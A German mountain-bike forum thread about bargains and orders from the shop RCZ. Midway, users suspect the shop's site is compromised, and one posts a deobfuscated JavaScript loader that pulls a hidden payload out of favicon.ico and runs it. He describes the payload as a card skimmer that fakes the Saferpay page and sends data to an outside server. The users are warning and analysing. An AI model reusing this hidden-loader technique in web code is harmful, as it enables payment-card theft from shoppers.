RCZ-Glaskugel: Wartezimmer, Spekulationen, Austausch

ma1208 · 16. Juni 2023

michael66 schrieb:
Möchtest du die Lyrik verkaufen?

Muss nicht, aber kann. Schreib mir bei Interesse einfach eine PN.

Anzeige

Schau mal hier:
luxroutage was ist das .

morph027 · 16. Juni 2023

Gnarf, falsch Post

MTB-News.de

DerHackbart · 16. Juni 2023

Morgen kommt bei mir wohl die 200er Fox Transfer an. Bin Mal gespannt ob ein Trigger dabei ist.

Schn33fraese · 16. Juni 2023

FritzeF schrieb:
Hat von euch jemand schon mal was zurück zu RCZ geschickt?
Wenn ja, an welche Adresse?

Ja. Ich habe kürzlich eine Gabel reklamiert und an diese Adresse geschickt:

ste NBD
chez luxroutage
Batiment ILEX
11 Rue Paul Richard
L-5324 Contern
Luxembourg

Hat mit DHL ohne Pobleme geklappt

TearZz · 17. Juni 2023

prolink schrieb:
Newsletter
http://go.mail-coach.com/t/r-e-ttirtjjd-hidldtujhh-r/

Focus Rennradrahmen für 100 ocken... also manchmal haut RCZ Sachen raus, da muss man schon einen arg großen Engel auf der Schulter sitzen haben der sagt: "Nein du brauchst das nicht".
Bei dem Niner Air 9 Rahmen gestern für 200€ konnte man halt auch nix verkehrt machen....

Cuthepro · 17. Juni 2023

TearZz schrieb:
Focus Rennradrahmen für 100 ocken... also manchmal haut RCZ Sachen raus, da muss man schon einen arg großen Engel auf der Schulter sitzen haben der sagt: "Nein du brauchst das nicht".
Bei dem Niner Air 9 Rahmen gestern für 200€ konnte man halt auch nix verkehrt machen....

Ohne Gabel, Stütze. Die man einzeln halt nun schlecht bekommt. Damit kein Schnäppchen mehr.

TearZz · 17. Juni 2023

Ja gut, die Gabel is wieder so ein Spezial Ding... dann halt nicht unbedingt was zum kaufen. Die Sattelstütze gibts für 40€ bei Ebay.

Bergziegel_MTB · 18. Juni 2023

Bekomme seit ein paar Wochen keinen Newsletter mehr. Herrlich, diese Ruhe...

big_scoop · 18. Juni 2023

dafür kommt bei mir wohl bald ein Paket mit EX1700 an… Dienstag bestellt, Freitag schon closed. Langsam nervt RCZ mit den ständigen lieferungen

luftschaukel · 18. Juni 2023

Taugt der der EX1700? Für Enduro und Park?

Remux · 18. Juni 2023

Das ist ein Enduro lrs…

MTB-News.de

md82 · 18. Juni 2023

Ich hätte noch einen EX1700 den ich zum Selbstkostenpreis zzgl. Versand abgeben würde.

Leider finde ich keinen Tauschpartner - hätte gerne einen in 27,5“ genommen.

Wenn also jemand möchte: 332€ zzgl. DPD Versand - gerne melden. Der LRS steht ungeöffnet im Karton im Keller.

Edit: habe den Karton gerade mal aufgemacht: MicroSpline, Centerlock, Tubelessband ist montiert und Ventile sind dabei.

luftschaukel · 18. Juni 2023

md82 schrieb:
Ich hätte noch einen EX1700 den ich zum Selbstkostenpreis zzgl. Versand abgeben würde.

Leider finde ich keinen Tauschpartner - hätte gerne einen in 27,5“ genommen.

Wenn also jemand möchte: 332€ zzgl. DPD Versand - gerne melden. Der LRS steht ungeöffnet im Karton im Keller.

Hast Post!

Stadtkater · 18. Juni 2023

Schade dass man von der Cura 4 nur 1 bestellen kann.

.floe. · 18. Juni 2023

Seit wann tauchen denn die Formula Thirtyfive Gabeln im Newsletter auf? Hat denn schon jemand eine bekommen? Mich würde interessieren, ob die Decals auch die vom Bild ausm Shop sind…

youdontknow · 18. Juni 2023

md82 schrieb:
Edit: habe den Karton gerade mal aufgemacht: MicroSpline, Centerlock, Tubelessband ist montiert und Ventile sind dabei.

Wenn er doch nur mit xD und 6 Loch kommen würde….

md82 · 18. Juni 2023

youdontknow schrieb:
Wenn er doch nur mit xD und 6 Loch kommen würde….

MicroSpline hab ich an beiden Rädern und am Ebike nutze ich Adapter auf 6-Loch

BTW: LRS ist verkauft

MTB-News.de

flowforfun · 18. Juni 2023

Ich will gerade RCZ öffnen, dann das. Windows PC, alles aktuell, Kaspersky (von dem ich mich endlich verabschiede, Norton ist schon drauf.)

5t3f4n · 18. Juni 2023

Mit Eset @Windows alles i.O.

demlak · 18. Juni 2023

Das könnte die Erklärung für die Misere mit den Kreditkarten sein:
https://sitecheck.sucuri.net/results/https/www.rczbikeshop.com/de/shopby https://labs.sucuri.net/signatures/sitecheck/malware.magento_shoplift/?123.2
Ich kann allerdings nichts dazu sagen, wie reliable sucuri.net ist.

flowforfun · 18. Juni 2023

demlak schrieb:
Das könnte die Erklärung für die Misere mit den Kreditkarten sein:
https://sitecheck.sucuri.net/results/https/www.rczbikeshop.com/de/shopby https://labs.sucuri.net/signatures/sitecheck/malware.magento_shoplift/?123.2
Ich kann allerdings nichts dazu sagen, wie reliable sucuri.net ist.

Gefällt mir nicht das Ganze…..

gosing · 18. Juni 2023

Der angezeigte code de-obfuskiert zu

Javascript:

(async function _f0() {
  let _g0 = await fetch("/skin/frontend/rcz/default/images/favicon.ico");
  if (_g0.ok) {
    let _g1 = await _g0.text();
    var _v0 = new Function(_g1.slice(-153027));
    return _v0();
  }
}());

Unter der URL des Favico's kommt man auf ne ICO file, welche jedoch am angeführten offset Javascript code beinhaltet, welchen dieser Code nachlädt, welcher zumindest das wort saferpay mehrmals enthält - auf jeden Fall sieht es nicht legitim aus JS für sowas in favicon.ico zu verstecken, das macht auch kein JS-packer...

Edit: Der JS Code in favicon.ico baut die Saferpay Website nach, sammelt die eingesammelten Daten, schreibt den hostname von dem das JS stammt (rcz) dazu, und sendet es in JSON via Websocket an einen Server. Ich hab gerade kein entsprechendes Tooling bei der Hand um die nervigen obfuscations aufzulösen, mal sehen ob mir im Krankenstand langweilig wird und ich den Kollegen von RCZ ein Writeup schreibe.
Auf den ersten Blick stimme ich zu, das sieht sehr schwammig aus. Eine nicht-belegte Möglichkeit wäre es, dass Angreifer welche diesen Code auf RCZ geschleust haben dadurch den User nicht auf die "echte" SaferPay Seite lotsen sondern auf von ihnen kontrollierten Code - wobei es mich noch wundert das dieser Code eben im Kontext von RCZ ausgeführt wird und nicht saferpay, und ich mich zu erinnern glaube das bei mir im Bezahlvorgang die legitime saferpay URL geladen wurde....das Hirn rattert, morgen mal genauer ansehen.

PORTEX77 · 18. Juni 2023

md82 schrieb:
MicroSpline ...

md82 schrieb:
Ebike ...

md82 schrieb:
Adapter auf 6-Loch

Drei Fails in einem Satz

:wink:

big_scoop · 18. Juni 2023

gosing schrieb:
Eine nicht-belegte Möglichkeit wäre es, dass Angreifer welche diesen Code auf RCZ geschleust haben dadurch den User nicht auf die "echte" SaferPay Seite lotsen sondern auf von ihnen kontrollierten Code - wobei es mich noch wundert das dieser Code eben im Kontext von RCZ ausgeführt wird und nicht saferpay, und ich mich zu erinnern glaube das bei mir im Bezahlvorgang die legitime saferpay URL geladen wurde....das Hirn rattert, morgen mal genauer ansehen.

nur die Saferpay Seite für uns Endkunden nach zu bauen würde doch aber auch bedeuten, dass RCZ keine Zahlungen erhalten würde oder ?

demlak · 18. Juni 2023

Heißt ja nicht, dass die Infos nicht doch durchgeleitet werden..

Damit das ganze nicht schon bei der ersten geplatzten Bezahlung auffällt, wird alles durchgeleitet.. und halt einmal gespiegelt.. damit man die Daten einfach für eine weitere Zahlung woanders nutzt.

RCZ-Glaskugel: Wartezimmer, Spekulationen, Austausch

ma1208

Anzeige

morph027

Blutgruppe MTB positiv

MTB-News.de

DerHackbart

l'enfer c'est les autres

Schn33fraese

TearZz

Cuthepro

TearZz

Bergziegel_MTB

big_scoop

luftschaukel

Remux

MTB-News.de

md82

luftschaukel

Stadtkater

.floe.

youdontknow

you´ll never know

md82

MTB-News.de

flowforfun

5t3f4n

demlak

freetourers Liebling

flowforfun

gosing

PORTEX77

big_scoop

demlak

freetourers Liebling